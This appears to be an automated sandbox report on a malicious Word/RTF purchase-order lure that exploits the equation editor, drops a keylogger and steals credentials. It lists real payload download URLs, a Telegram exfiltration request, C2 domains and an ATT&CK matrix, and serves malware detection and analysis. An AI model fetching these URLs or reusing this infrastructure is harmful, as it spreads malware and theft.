                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeDirectory queried: C:\Users\user\Documents\VIPRecoveryJump to behavior
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid Accounts1
                Native API
                2
                Scripting
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                11
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution
                1
                DLL Side-Loading
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                13
                System Information Discovery
                Remote Desktop Protocol11
                Data from Local System
                25
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)3
                Obfuscated Files or Information
                Security Account Manager1
                Query Registry
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Install Root Certificate
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSH1
                Input Capture
                3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNC1
                Clipboard Data
                34
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Remote System Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry
                Proc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                Virtualization/Sandbox Evasion
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1519252 Sample: Thyssenkrupp PO040232.doc Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 44 Initial sample is an obfuscated RTF file 2->44 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 26 other signatures 2->50 8 WINWORD.EXE 291 18 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 36 66.63.187.123, 49161, 80 ASN-QUADRANET-GLOBALUS United States 10->36 26 C:\Users\user\AppData\...\hgqilegacy20306.exe, PE32 10->26 dropped 28 C:\Users\user\...\XcsQpLjhNNvxYtrw[1].exe, PE32 10->28 dropped 62 Office equation editor establishes network connection 10->62 64 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->64 17 hgqilegacy20306.exe 3 10->17         started        file6 signatures7 process8 signatures9 38 Machine Learning detection for dropped file 17->38 40 Adds a directory exclusion to Windows Defender 17->40 42 Injects a PE file into a foreign processes 17->42 20 hgqilegacy20306.exe 12 8 17->20         started        24 powershell.exe 4 17->24         started        process10 dnsIp11 30 reallyfreegeoip.org 20->30 32 api.telegram.org 20->32 34 9 other IPs or domains 20->34 52 Installs new ROOT certificates 20->52 54 Tries to steal Mail credentials (via file / registry access) 20->54 56 Tries to harvest and steal browser information (history, passwords, etc) 20->56 signatures12 58 Tries to detect the country of the analysis system (by using the IP) 30->58 60 Uses the Telegram API (likely for C&C communication) 32->60

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Thyssenkrupp PO040232.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                Thyssenkrupp PO040232.doc100%AviraHEUR/Rtf.Malformed
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\hgqilegacy20306.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                http://ocsp.entrust.net030%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://varders.kozow.com:80810%URL Reputationsafe
                http://aborters.duckdns.org:8081100%URL Reputationmalware
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                http://anotherarmy.dns.army:8081100%URL Reputationmalware
                http://checkip.dyndns.org/q0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
                http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exee0%Avira URL Cloudsafe
                https://api.telegram.org/bot0%Avira URL Cloudsafe
                http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeuuC:0%Avira URL Cloudsafe
                https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
                http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exe0%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                http://ns.adobe..00%Avira URL Cloudsafe
                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exej0%Avira URL Cloudsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe
                http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                http://ns.adobe.c/D0%Avira URL Cloudsafe
                https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
                https://www.google.com/sorry/index0%Avira URL Cloudsafe
                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
                http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeC:0%Avira URL Cloudsafe
                https://secure.comodo.com/CPS00%Avira URL Cloudsafe
                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                https://www.google.com/search?q=net0%Avira URL Cloudsafe
                http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    mail.jhxkgroup.online
                    217.12.218.219
                    truetrue
                      unknown
                      checkip.dyndns.com
                      193.122.130.0
                      truefalse
                        unknown
                        checkip.dyndns.org
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exetrue
                          • Avira URL Cloud: safe
                          unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20and%20Time:%209/26/2024%20/%206:20:30%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20358075%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabhgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeeEQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://duckduckgo.com/ac/?q=hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfhgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/server1.crl0hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.telegram.org/bothgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002668000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&ihgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeuuC:EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.entrust.net03hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ns.adobe..0hgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.diginotar.nl/cps/pkioverheid0hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchhgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exejEQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://varders.kozow.com:8081hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/favicon.icohgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://aborters.duckdns.org:8081hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          https://ac.ecosia.org/autocomplete?q=hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/sorry/indexhgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?Lhgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/search?q=wmfhgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://anotherarmy.dns.army:8081hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: malware
                          unknown
                          http://checkip.dyndns.org/qhgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://ns.adobe.c/Dhgqilegacy20306.exe, 00000008.00000002.916972860.0000000000FDD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26ahgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/search?q=nethgqilegacy20306.exe, 00000008.00000002.917010447.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://66.63.187.123/txt/XcsQpLjhNNvxYtrw.exeC:EQNEDT32.EXE, 00000002.00000002.397922458.000000000029E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://ocsp.entrust.net0Dhgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehgqilegacy20306.exe, 00000005.00000002.406450755.0000000002237000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.00000000025E1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://secure.comodo.com/CPS0hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.entrust.net/2048ca.crl0hgqilegacy20306.exe, 00000008.00000002.916829538.00000000007D9000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=hgqilegacy20306.exe, 00000008.00000002.917824826.000000000365B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedhgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://reallyfreegeoip.org/xml/hgqilegacy20306.exe, 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hgqilegacy20306.exe, 00000008.00000002.917010447.0000000002620000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          132.226.8.169
                          unknownUnited States
                          16989UTMEMUSfalse
                          149.154.167.220
                          api.telegram.orgUnited Kingdom
                          62041TELEGRAMRUtrue
                          188.114.97.3
                          reallyfreegeoip.orgEuropean Union
                          13335CLOUDFLARENETUStrue
                          217.12.218.219
                          mail.jhxkgroup.onlineUkraine
                          21100ITLDC-NLUAtrue
                          66.63.187.123
                          unknownUnited States
                          8100ASN-QUADRANET-GLOBALUStrue
                          188.114.96.3
                          unknownEuropean Union
                          13335CLOUDFLARENETUSfalse
                          193.122.130.0
                          checkip.dyndns.comUnited States
                          31898ORACLE-BMC-31898USfalse
                          158.101.44.242
                          unknownUnited States
                          31898ORACLE-BMC-31898USfalse
                          132.226.247.73
                          unknownUnited States
                          16989UTMEMUSfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519252
                          Start date and time:2024-09-26 09:18:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 35s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Thyssenkrupp PO040232.doc
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winDOC@9/15@89/9
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 52
                          • Number of non-executed functions: 11
                          Cookbook Comments:
                          • Found application associated with file extension: .doc
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Active ActiveX Object
                          • Scroll down
                          • Close Viewer
                          • Override analysis time to 78168.3071081964 for current running targets taking high CPU consumption
                          • Override analysis time to 156336.614216393 for current running targets taking high CPU consumption
                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Thyssenkrupp PO040232.doc
                          TimeTypeDescription
                          03:19:18API Interceptor275x Sleep call for process: EQNEDT32.EXE modified
                          03:19:22API Interceptor4090637x Sleep call for process: hgqilegacy20306.exe modified
                          03:19:24API Interceptor17x Sleep call for process: powershell.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          132.226.8.169TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          PI-96328635,PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Products List.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          149.154.167.220TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
